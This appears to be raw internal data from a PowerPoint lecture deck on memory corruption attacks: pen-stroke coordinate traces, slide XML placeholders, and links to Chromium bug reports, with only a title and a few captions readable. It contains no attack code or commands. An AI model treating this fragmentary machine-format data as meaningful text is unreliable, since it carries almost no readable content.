  <inkml:trace contextRef="#ctx0" brushRef="#br0">619 1090 16383,'-9'28'0,"-4"-2"0,1 0 0,-7 1 0,-3 16 0,-7 6 0,-14 24 0,14-26 0,-1 16 0,2 0 0,7-19 0,-9 28 0,-2 11 0,15-20 0,1 2 0,-12 20 0,0 5 0,12-25 0,0 1 0,1 1 0,-1-1 0,1 1 0,-1-2 0,-8 31 0,2-4 0,8-19 0,1-1 0,-4 21 0,3-1 0,12-31 0,1-1 0,-4 17 0,-1 1 0,5-11 0,2 0 0,4 8 0,1 2 0,0 10 0,1 2 0,4-1 0,0-1 0,-5-1 0,0-5 0,3-24 0,-1-4 0,-3 2 0,1-2 0,12 42 0,-7-28 0,-7-17 0,0 1 0,6 47 0,-9-8 0,0 2 0,4-31 0,0 2 0,1 10 0,1 7 0,2-7 0,3-9 0,1-4 0,1 11 0,4 0 0,5-5 0,2-4 0,15 22 0,-11-28 0,1-1 0,14 26 0,-1-7 0,-13-9 0,3 3 0,-10-16 0,2 0 0,21 24 0,-8-7 0,-1-3 0,3-6 0,-7-6 0,1-1 0,10-3 0,11 14 0,17 0 0,-8-11 0,-9-13 0,3 3 0,-9-6 0,0 0 0,9 7 0,1-2 0,-5-6 0,1-1 0,10 7 0,3 1 0,9-2 0,4 0 0,-14-6 0,2 2 0,-4-3 0,9 1 0,0-2 0,-7-3 0,2 2 0,-3-5 0,2-3 0,-1-1 0,16 10 0,1 0 0,-7-10 0,-2-2 0,-11-1 0,-1 1 0,6 1 0,0-1 0,-8-4 0,2-2 0,27 2 0,-2-2 0,-32-9 0,-1-1 0,32 2 0,-2-3 0,12-4 0,-36-3 0,3-3 0,5-4 0,-1-2 0,-10 2 0,-1-2 0,5-8 0,-3 1 0,8 1 0,8-14 0,-24 9 0,27-12 0,-31 12 0,0 0 0,-2-1 0,0-1 0,5-5 0,-3 0 0,3-9 0,7-10 0,-22 14 0,25-26 0,-8 10 0,8-10 0,-12 13 0,1-1 0,-1 1 0,-13 13 0,-1-5 0,-8 18 0,-2-11 0,9 8 0,-8-8 0,18-15 0,-16 9 0,15-28 0,-3 11 0,-2-23 0,9-7 0,-17-9 0,5 14 0,-19 29 0,0 0 0,21-33 0,-10 11 0,9-12 0,-13 39 0,-1-18 0,10-10 0,-27 41 0,13-52 0,-8 12 0,-8 20 0,0-3 0,8-41 0,-8 40 0,-2-1 0,1-39 0,0 36 0,0 0 0,0 5 0,0 2 0,0 1 0,0 1 0,1-2 0,-2 2 0,-7-45 0,7 25 0,0-2 0,-8 10 0,-1-1 0,3-32 0,1 1 0,0 35 0,0 2 0,-5-26 0,1 1 0,4 27 0,0 1 0,0-12 0,0-3 0,-4-4 0,0 0 0,4 12 0,0 1 0,-4-6 0,-1 0 0,0 5 0,1 3 0,-9-36 0,9 38 0,0 0 0,-9-39 0,4 31 0,-1-4 0,5 1 0,-2-1 0,-12-6 0,-2-1 0,10 8 0,-1-1 0,-8-3 0,-2-3 0,-5-13 0,-1-2 0,3 3 0,0 0 0,-2 3 0,-2 0 0,1-3 0,2 3 0,10 27 0,1 1 0,-4-18 0,-4 0 0,-1 11 0,-2 2 0,6 7 0,-1 0 0,-9-1 0,1 3 0,-7-14 0,13 27 0,-4 2 0,-31-21 0,19 19 0,-2 2 0,4 8 0,0 1 0,-26-20 0,8 18 0,10 4 0,-27-7 0,-4 0 0,14 9 0,-6 0 0,22 12 0,-12 5 0,-27-8 0,-7 15 0,37-3 0,-2 1 0,-6 3 0,0 2 0,5 3 0,0 1 0,-12 0 0,1 2 0,16 2 0,3 2 0,-6 3 0,3 1 0,-22 4 0,-11 8 0,11-17 0,0-2 0,23-8 0,-1 7 0,28-5 0,-30 5 0,-17 2 0,7 1 0,-20 8 0,-1 0 0,8-9 0,23 1 0,1-1 0,-25-7 0,33 6 0,0 1 0,-43 3 0,-3 7 0,44-10 0,1 1 0,-29 15 0,-9 4 0,44-7 0,-26 10 0,42-14 0,-17 9 0,21-10 0,1-2 0,0 1 0,6-6 0,-5 9 0,-1-2 0,6 1 0,-13 5 0,6-2 0,-1 0 0,3-1 0,10-6 0,-2-1 0,3 0 0,0 1 0,-4 0 0,4 4 0,0-8 0,-3 7 0,7-7 0,-4 7 0,1-7 0,7 3 0,-6-4 0,7-4 0,0 3 0,-3-3 0,2 4 0,1 0 0,-3-4 0,7 7 0,-7-6 0,3 7 0,0 0 0,-3-7 0,7 6 0,-7-7 0,7 4 0,-3 8 0,4-6 0,0 10 0,0-11 0,0 3 0,0-4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0:19:31.8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657 0 24575,'-5'14'0,"-3"-1"0,7 0 0,-7-3 0,2 16 0,-4-3 0,1 1 0,-3 8 0,3-16 0,-2 16 0,0-4 0,0 6 0,-1 1 0,-3-8 0,1 19 0,-3-2 0,-7 20 0,8-12 0,-10-4 0,13-14 0,-2-7 0,-2 6 0,6-13 0,-8 6 0,9-8 0,-3-8 0,3 6 0,1-6 0,0 4 0,0 3 0,0-7 0,4 3 0,-3-8 0,2-1 0,-3 0 0,0 5 0,0 1 0,0 7 0,0-11 0,4 6 0,-3-7 0,2 4 0,1 0 0,-3 0 0,3 0 0,0 0 0,-3-4 0,7-5 0,-3-9 0,4-12 0,0 1 0,0-6 0,-5 0 0,-2-1 0,-3 0 0,4-6 0,-4 5 0,4-7 0,-6 1 0,-2 6 0,2 3 0,3 6 0,1 5 0,3 1 0,0 0 0,-3 3 0,7-8 0,-7 8 0,3-7 0,-1 7 0,-2-8 0,7 4 0,-7-4 0,7 4 0,-7 0 0,7 5 0,-3 0 0,4 4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0:19:33.0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0 332 24575,'18'-9'0,"0"3"0,16-12 0,-5 9 0,27-21 0,-5 14 0,1-10 0,-12 12 0,-7-3 0,-6 7 0,0-1 0,-1 1 0,-12 1 0,-1 4 0,-4 1 0,-4 0 0,-1-2 0,0 1 0,1 1 0,0 0 0,3 3 0,1-7 0,1 7 0,3-3 0,-4 0 0,0 3 0,-4-7 0,7 3 0,-2-4 0,8-1 0,-4 1 0,4 0 0,-8 0 0,3 0 0,-8 0 0,3 4 0,-7-4 0,3 8 0,-4-3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0:21:32.82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38 24575,'18'-5'0,"23"1"0,17 4 0,25 0 0,-10 0 0,4 0 0,-16 0 0,-1 0 0,9 0 0,2 0 0,2 0 0,-2 0-283,-19 0 0,0 0 283,18 0 0,-2 0 140,27 0-140,-18 0 0,-12 0 0,-14 0 0,-3 0 0,-21 0 0,19 0 426,-2 0-426,21-8 0,-14 1 0,23-1 0,-19 3 0,23 5 0,13 0-1639,-36 4 1,1 2 1548,1-5 1,0 0-875,-2 4 0,-2 0 964,25-5 0,-27 5 0,-3-4 0,-14 4 0,-10-5 3064,4 4-3064,-13 1 2320,15 5-2320,-10 0 0,26 3 0,-16-2 0,31-3 0,-9-3 0,12-5 0,-13 0 0,10-7 0,-23 5 0,24-12 0,-25 7 0,11-2 0,-13-1 0,-8 9 0,-6-5 0,-4 6 0,-2 0 0,3 0 0,7 0 0,16 8 0,-3-1 0,9 1 0,1 4 0,-17-10 0,15 5 0,-19-7 0,21 0 0,-10 0 0,3-4 0,-16-1 0,-7-4 0,-4 4 0,-5-3 0,-1 3 0,-3-1 0,8 6 0,1 1 0,0 7 0,0-7 0,-5 3 0,-1-4 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-4 0 0,-1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0:21:36.1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24575,'24'0'0,"1"0"0,-11 4 0,12-3 0,-6 7 0,1-7 0,4 3 0,-10-4 0,18 0 0,-17 0 0,9 0 0,-11 0 0,0 0 0,3 0 0,-3 0 0,11 5 0,11 0 0,14 2 0,9-3 0,5-4 0,-13 0 0,11 0 0,-24 0 0,36 0 0,-33 0 0,13 0 0,-8 0 0,-2 0 0,21 7 0,-14-5 0,-3 5 0,-14-2 0,-7-4 0,6 4 0,-9-1 0,10-3 0,-10 7 0,1-7 0,1 8 0,-6-7 0,12 8 0,9-9 0,39 4 0,-25-5 0,2 0-272,-6 0 1,1 0 271,9 0 0,-4 0-96,-3 0 96,21 7 0,-24-5 0,0 5 0,-3-7 0,-21 4 0,6-3 0,-13 3 0,12-4 0,-12 0 540,6 0-540,-8 0 99,7 0-99,3 0 0,22-5 0,1 4 0,16-4 0,-3-3 0,14 7 0,3-7 0,0 8 0,-28 5 0,-1-1-3277,32-1 1638,-23 6 1,-1 0 1408,11-7 230,-4 8 0,-34-10 0,-17 0 0,8 0 0,-14 0 0,15 0 3276,-9 0 0,25 0-3044,-12 0-232,2 0 0,14 0 0,8 0 0,28 0 0,-21 0 0,1 0-871,-3 0 0,-1 0 871,6-1 0,-2 2 0,20 4-367,-22-5 0,-1 1 367,3 4 0,33-5 0,-47 0 0,-23 0 0,0 0 1674,-10 0-1674,4 0 802,-4 0-802,3 4 0,-2-3 0,-1 3 0,10-4 0,-8 0 0,17 0 0,-6 0 0,23 0 0,-12 0 0,12 0 0,-15 0 0,-1-5 0,-6 4 0,4-5 0,9 6 0,-3 0 0,36 0 0,-19 0 0,23 8 0,-27-7 0,10 6 0,-8-7 0,-8-4 0,-9-1 0,-18 0 0,-8-3 0,3 7 0,0-3 0,1 4 0,4 0 0,0 0 0,7 0 0,3 5 0,-1-4 0,-2 5 0,-11-6 0,0 0 0,-5 0 0,0 0 0,0 0 0,0-5 0,-4 0 0,3 0 0,-4 1 0,5 4 0,0 0 0,0 0 0,0-4 0,0 3 0,-4-3 0,-1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7:41:26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20 16502,'-7'-12'0,"7"5"3534,7 7-3534,10 12 1388,2 7-1388,15 8 739,-5 7-739,0-9 0,-3 7 2412,-7-13-2412,0 0 0,-2 4 0,-5-10 0,0 4 0,0-5 0,-5 0 0,3-5 0,-3-2 0,0 1 0,-2 0 0,0 1 0,2-2 0,0 1 0,-2-5 0,-5 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0:21:38.2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24575,'35'0'0,"0"5"0,13 4 0,17-2 0,29 0 0,4-7 0,-44 0 0,-1 0-1642,42 0 1642,-34 0 0,-1 0 0,14 0 0,-17 0 0,1 0 0,23 0 0,17 0 0,-4 0 0,-3 0 0,-10 0 0,-13 0 0,-18 0 0,1 0 0,20 0 0,-18 0 0,2 0 0,39 0 0,-13 0 0,-3 0 0,-13 0 532,12 0-532,20 0 0,-12 0 0,8 0 0,-49 0 272,15 0-272,-15 7 0,7-5 0,-3 5 838,-13-2-838,13-4 0,3 4 0,27 4 0,-11-7 0,11 13 0,-13-13 0,-1 5 0,-9-3 0,8-3 0,-29 3 0,12-4 0,-18 0 0,19 0 0,-9 0 0,23 0 0,17 0 0,-20 0 0,0-1 0,0 2 0,1 6 0,21-5 0,-19 12 0,-23-12 0,23 13 0,-23-14 0,23 14 0,-23-14 0,2 7 0,-7-8 0,-6 0 0,-3 0 0,21-8 0,-6-1 0,13 0 0,9-5 0,-31 12 0,30-5 0,-16 0 0,47 5 0,-20-5 0,-18 6 0,-2 2 0,4-1 0,19 0 0,-23 0 0,14 0 0,-14 0 0,10 0 0,4 0 0,2 0 0,-2 0 0,-17 0 0,-14 0 0,1 0 0,-12 0 0,2 0 0,-11 0 0,0-5 0,-1 4 0,-4-3 0,0 4 0,4 0 0,1 0 0,11 0 0,-9 0 0,5 0 0,-8 0 0,-3 0 0,3 0 0,-8 4 0,-1-3 0,-4 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0:34:09.3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28 24575,'10'-9'0,"2"4"0,-7-3 0,3 7 0,1-3 0,5 4 0,0 0 0,11 0 0,16 0 0,10 0 0,13 0 0,14 8 0,3 3 0,-13-1 0,20 7 0,-34-15 0,24 6 0,-13-8 0,-14 0 0,-3 0 0,-14 0 0,14 0 0,-17 0 0,15-5 0,-26 4 0,5-9 0,1 9 0,-6-3 0,5 4 0,0 0 0,-5 0 0,13 0 0,-6 0 0,8 0 0,0 0 0,12 7 0,-9-5 0,3 9 0,-8-10 0,-13 3 0,12-4 0,-12 0 0,6 0 0,-1-5 0,-5 4 0,6-8 0,-8 8 0,7-3 0,2 4 0,8 0 0,0 0 0,-1 0 0,1 0 0,26 0 0,-27 0 0,25 0 0,-18 0 0,-3 10 0,-2-8 0,-11 13 0,-4-14 0,6 8 0,8-3 0,-12 1 0,9-2 0,-9-5 0,11 0 0,1 0 0,0 0 0,-8 0 0,6 0 0,-6 0 0,7 0 0,14 0 0,4 0 0,12 0 0,1 0 0,-22 0 0,17 0 0,-16 0 0,20 0 0,-13 5 0,10-4 0,-23 4 0,3-5 0,-8 0 0,-6 0 0,0 0 0,6 0 0,-17 0 0,16 0 0,-16-4 0,16 3 0,-12-7 0,13 7 0,8-10 0,-4 9 0,11-5 0,-13 7 0,13 0 0,3 0 0,13 7 0,1 9 0,-21-1 0,15 7 0,-28-11 0,30 5 0,-30-10 0,28 2 0,-15-8 0,20 0 0,1 0 0,-1 0 0,1 0 0,-14 0 0,-3-6 0,-14 5 0,1-4 0,-8 5 0,6 0 0,-6-5 0,0 4 0,6-5 0,-6 6 0,1 0 0,4 0 0,-12 0 0,13 0 0,-17 0 0,4 0 0,-11 0 0,0 0 0,0 0 0,0 0 0,4 0 0,2 0 0,3 0 0,0 0 0,0-4 0,0 3 0,-4-3 0,3 4 0,-11-4 0,6 3 0,-7-3 0,4 4 0,-4-4 0,3 3 0,-3-3 0,0 0 0,3 3 0,-7-3 0,3 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0:34:23.8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15 24575,'9'10'0,"0"-2"0,0-8 0,4 0 0,-3 0 0,8 0 0,-4 0 0,4 0 0,0 0 0,7 0 0,3 5 0,20-4 0,3 11 0,0-10 0,-3 6 0,5 1 0,-3-2 0,1-2 0,5 2 0,3-1 0,13-1 0,0-1 0,-15-3 0,1-2 0,19 1 0,1 0 0,-21 0 0,0 0 0,25 0 0,-6 0 0,-11 0 0,20 0 0,-2 0 0,-32 0 0,13 4 0,0 1 0,-10-3 0,11 6 0,-17-8 0,-14 0 0,-6 4 0,-3-3 0,14 10 0,-9-4 0,32 9 0,-24-9 0,23 0 0,-23-7 0,36 0 0,-6 0 0,26 0 0,-26 0 0,-7 0 0,-26 0 0,-1 0 0,-6 0 0,4 0 0,-12 0 0,2 0 0,2 0 0,-8 0 0,17 0 0,7-7 0,-2 5 0,23-5 0,4-2 0,-11 7 0,21-6 0,-11 8 0,4-8 0,-3 7 0,-4-14 0,-23 13 0,23-5 0,-10 7 0,14 0 0,-14 0 0,10-7 0,-23 5 0,23-12 0,-10 5 0,0-1 0,24-5 0,19 13-242,-43-3 0,0 1 242,43 9 0,-6-3 0,-34 3-30,24-5 30,-13-7 0,-1 5 0,14-5 0,-10-1 0,10 6 0,-1-5 0,-9 7 0,23 0 0,-36 0 0,33 0 0,-34 0 0,24 0 0,-14 0 0,14 0 0,-23 0 0,32 0 0,-32 0 0,23 0 0,-14 0 0,14-8 0,-10 6 0,10-7 0,-14 9 0,14 0 0,-10 0 0,10 8 0,-1 2 0,-9-1 0,23 8-767,4-15 767,2 6 0,-2-8 0,-31 0 0,-16 0 0,13 0 0,-20 0 0,34 0 0,3 0-161,6 8 161,-30-7 0,0 0 0,27 8 0,-23-9 0,2 0 0,27 0 0,-16 0 0,6 0-743,9-6 0,-4 1 743,-26 4 0,0-1 0,37-7 0,-5-3 0,-13 1 0,-8 5 0,0 0 0,4-2 0,-20 7 0,-1 2 701,18-1-701,13 0 0,-3 0 0,-13 0 0,-1 0 0,14 8 0,-10-6 0,23 15 0,-37-15 0,-5 7 0,3 0-1772,33-7 1772,-25 7 0,4 0 0,3-7 0,3-1 0,14 3 0,0 1 0,-2-5 0,-2 0 0,-8 0 0,-3 0 0,-9-4 0,-2-1 0,-4 0 0,0-2 0,-4 2 0,1 0 271,4-1 0,-2 2-271,11 4 1469,-16 0-1469,0-8 0,-10 7 0,10-7 1988,-14 8-1988,14 0 0,3 0 0,27 9 0,-10 0 0,23 9-1181,3 1 1181,-33-8 0,3-2 0,-1-3 0,1 0 0,5 3 0,0 1 0,-7-4 0,0-1 0,7 1 0,0 0 0,-12-1 0,0-1 0,17-4 0,0 0 0,-15 4 0,-4 1 0,43-3 0,-14 8 0,0 0 0,14-7 0,-9 3 0,0-1 0,9-5 0,-45 1 0,-2-2 0,17-6 0,10-2 0,-14-8 0,1 1 0,-1 0 0,1 7 0,-1 2 0,1 7 0,13 0 0,-11 0 0,-2 0 0,-24 0 0,5 0 1181,-3-8-1181,9 1 0,-4-6 0,-14 1 0,1 6 0,13-7 0,-18 11 0,29-5 0,-28 2 0,30 4 0,-23-4 0,23 5 0,4 0 0,3 0 0,9 0 0,-25 0 0,-12 0 0,6 7 0,-2-5 0,34 5 0,-24-7 0,-5 4 0,3 1 0,46-3 0,-17 7 0,-23-8 0,-4-2 0,-6 1 0,29 0 0,-25 0 0,9 0 0,-10 0 0,0 0 0,-3 0 0,-21 0 0,-1 0 0,-8 0 0,-4 0 0,3 0 0,-3 0 0,0 0 0,3 0 0,-3 0 0,4 0 0,-3 4 0,2-3 0,-3 3 0,4 0 0,0-3 0,7 3 0,-5-4 0,2 0 0,-9 0 0,-4 0 0,-4 4 0,-1-3 0,-4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7:42:39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3128 8 24575,'-93'-6'0,"46"5"0,-25 2 0,-3 3 0,2 9 0,-3 6 0,11-7 0,-3 0-1189,15-2 0,-2 0 1189,-33 4 0,-7 1 0,0-1 0,6 0 0,31-4 0,-1 2 0,-9 5 0,-5 2 0,7 1 0,14-1 0,0 1 0,-38 15 0,1-1 0,-2 8 0,13-3 0,-1 3 0,29-13 0,-1 2 0,-31 17 0,-2 1 0,25-11 0,3 0 0,0-1 0,0 1 0,5-1 0,1 1 0,-1 6 0,2-1 0,-18 13 0,19-15 0,3-1 567,3-8-567,-19 16 0,27-21 0,0 0 0,7-2 0,-31 20 1811,33-16-1811,-21 8 0,33-20 0,-5-10 0,11-7 0,2-7 0,10 0 0,-4-4 0,5 4 0,-6-5 0,0-5 0,0 3 0,0-9 0,0 4 0,0-5 0,0 5 0,-7-14 0,5 12 0,-5-14 0,7 1 0,0-2 0,0 5 0,0-2 0,0 14 0,0-6 0,0 1 0,0 5 0,0-4 0,0 9 0,0-9 0,0 10 0,0-5 0,6 11 0,-5 2 0,4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7:42:40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24575,'7'-6'0,"3"5"0,2-5 0,2 6 0,18 0 0,-1 0 0,15 7 0,0-5 0,1 5 0,-1-7 0,-10 0 0,8 7 0,-18-6 0,8 6 0,0-7 0,-13 0 0,12 0 0,-20 0 0,10 5 0,-4-3 0,5 8 0,-5-8 0,-2 8 0,1-3 0,0 0 0,1 3 0,4-8 0,-10 3 0,5-5 0,-6 0 0,0 0 0,0 0 0,0 5 0,-6-3 0,0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7:43:50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2591 1384 24575,'-17'-12'0,"-2"0"0,-6 5 0,-9 1 0,-41-10 0,-16 0-735,18 7 0,-1-1 735,-21-8 0,20 11 0,-2 0 0,21-3 0,-1-2-1177,-24-7 0,-4-2 1177,10 1 0,2-1 0,9 2 0,2-2-569,10 0 0,0-2 569,-11-9 0,0-3 0,11 3 0,1-2 0,-10-11 0,4 1 0,-16-11 0,34 17 0,-12-5 891,18 16-891,-15-26 0,13 29 0,8-9 2671,8 20-2671,1-10 1400,1 9-1400,3-3 0,-3 4 0,4 1 0,7-5 0,-5 3 0,4-9 0,-5 9 0,0-9 0,-1 10 0,7-5 0,-5 1 0,-1-2 0,-2-6 0,-4 6 0,12 2 0,-5 4 0,9-4 0,-8 3 0,3-9 0,0 4 0,-4 0 0,10 2 0,-10 4 0,10 1 0,-10 0 0,9 0 0,-8 0 0,8-1 0,-3 1 0,5 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 12 0,-6 7 0,0 13 0,-7 5 0,0 10 0,-5-7 0,3 7 0,-3-10 0,6 0 0,0-5 0,5-2 0,-4-5 0,10 0 0,-10 0 0,4 0 0,-5 0 0,0 0 0,0 0 0,-1-5 0,7 4 0,-5-10 0,9 10 0,-8-10 0,3 9 0,0-3 0,2 5 0,-1-5 0,-1-2 0,1 0 0,-5-3 0,9 8 0,-8-8 0,8 8 0,-9-8 0,10 3 0,-4-5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7:43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24575,'37'14'0,"6"-6"0,-6-3 0,44 6 0,-8 2 0,-2 3 0,0 0 0,7-1 0,14 9 0,-63-23 0,-12 5 0,-5-6 0,-5 0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7:46:0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1107 24575,'0'-12'0,"5"5"0,-4-4 0,5-1 0,-1-7 0,2-5 0,5-1 0,0 1 0,1-10 0,0 12 0,1-20 0,7 11 0,-4-15 0,4 9 0,-6-7 0,-3 23 0,3-22 0,-3 22 0,-3-8 0,1 6 0,-8 9 0,3-3 0,0 5 0,2-1 0,5 1 0,0-5 0,0 3 0,0-9 0,5 10 0,-9-5 0,8 6 0,-14 0 0,3-6 0,0 10 0,-3-8 0,3 9 0,0-5 0,-3-1 0,3 1 0,0 0 0,2 0 0,5-6 0,0 5 0,0-10 0,0 9 0,0-4 0,-5 6 0,3 0 0,-8 0 0,8 0 0,-8-1 0,8 1 0,-3 0 0,0 0 0,3 5 0,-8-4 0,8 4 0,-8-5 0,8 0 0,-8-6 0,8 10 0,-8-8 0,3 9 0,-11 0 0,0 2 0,-7 10 0,1 2 0,-5 0 0,-13 9 0,3-14 0,-19 14 0,24-9 0,-6 0 0,15 3 0,1-8 0,0 8 0,5-3 0,-4 0 0,5-2 0,-12-5 0,4 0 0,-3 0 0,-1 5 0,5-3 0,-10 3 0,4-5 0,0 0 0,6 5 0,8 2 0,16 0 0,-9-2 0,9-5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7250E-0EEC-3342-BAA1-2161A6B2A47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9F8A5-8FD6-EA4C-8C10-4D7FB5642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69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9F8A5-8FD6-EA4C-8C10-4D7FB56422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24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8903-D43D-0946-9CEC-88291162EE1D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3000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645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9F8A5-8FD6-EA4C-8C10-4D7FB564226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18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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F65A6B2-D611-3F45-81ED-71C251CD43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101379" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8AAD4D4-00C0-3F48-A182-214ED1D5B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1380" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC82C242-C3A5-4449-B101-2D83849B88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fld id="{6EC98E00-06F5-4F46-971A-29DE904DE23F}" type="slidenum"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50</a:t>
            </a:fld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399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9F8A5-8FD6-EA4C-8C10-4D7FB564226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61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9F8A5-8FD6-EA4C-8C10-4D7FB564226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56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384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9F8A5-8FD6-EA4C-8C10-4D7FB564226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31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8903-D43D-0946-9CEC-88291162EE1D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/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253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9CC68-C622-3D4A-9940-0BB3E54FC2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20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9CC68-C622-3D4A-9940-0BB3E54FC2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86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9CC68-C622-3D4A-9940-0BB3E54FC2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71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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEC8AD29-FFD1-884F-AFD3-ECA56E42479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96259" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C92487F-FCBE-DD49-9ADA-5A05DD519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60" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA707E94-F87C-7248-980A-50A10683D3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fld id="{6FD81A4A-6671-2D4C-AE62-681BF27AAACF}" type="slidenum"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15</a:t>
            </a:fld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719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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEC8AD29-FFD1-884F-AFD3-ECA56E42479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96259" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C92487F-FCBE-DD49-9ADA-5A05DD519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60" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA707E94-F87C-7248-980A-50A10683D3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fld id="{6FD81A4A-6671-2D4C-AE62-681BF27AAACF}" type="slidenum"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16</a:t>
            </a:fld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547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BDEC-E906-9F47-ACE5-C89669B2B6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83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9F8A5-8FD6-EA4C-8C10-4D7FB564226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83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D3DE2D1E-FF22-704E-A068-ADC50202CE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fld id="{BDB971CB-B13B-9D48-9E01-C3CE3516BE4B}" type="slidenum">
              <a:rPr lang="en-US" altLang="ja-JP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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ja-JP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C52426C5-621A-CD40-94F7-13647B4676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B5E21119-3709-1449-A6BC-89CC6BD755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66023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11/15/21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04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4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0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048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17600" y="1524000"/>
            <a:ext cx="5232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524000"/>
            <a:ext cx="5232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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22AB2A3-46B5-DE4E-8836-12687DADED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C7DDDEE-CAE0-A24B-A15C-825B383A33D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7526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4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78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1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1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67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11/15/21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8301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3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customXml" Target="../ink/ink17.xml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customXml" Target="../ink/ink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customXml" Target="../ink/ink21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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink2.xml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customXml" Target="../ink/ink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10.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink6.xml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25.xm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2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customXml" Target="../ink/ink29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customXml" Target="../ink/ink31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.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3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crbug.com/1252878" TargetMode="External"/><Relationship Id="rId13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12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink38.xml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6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.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crbug.com/1254631" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image530.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crbug.com/1247260" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink36.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crbug.com/1236318" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink39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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink42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65.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4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9EBA007-9C35-C24D-A003-684E218FB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92863" y="1755441"/>
            <a:ext cx="5716338" cy="4144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81EC1-E2C4-BE41-B86A-1C257788F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6687" y="1852042"/>
            <a:ext cx="5716338" cy="3710468"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>MEMORY CORRUPTION ATTACKS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Vitaly Shmatikov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60089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941E9-16F7-A342-A9EB-E544AECF4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Machine Code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F6F6EEC-AD67-734C-93B4-04DC1A8F8289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4374410" y="2514645"/>
            <a:ext cx="1371600" cy="118855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Compiler (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc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27F415-19A1-6145-8F91-4541B0FA6FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171540" y="4954979"/>
            <a:ext cx="3100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 code of simplified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>meet.c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496FCA-85EB-8640-A818-B82EE62A249A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5848350" y="5867444"/>
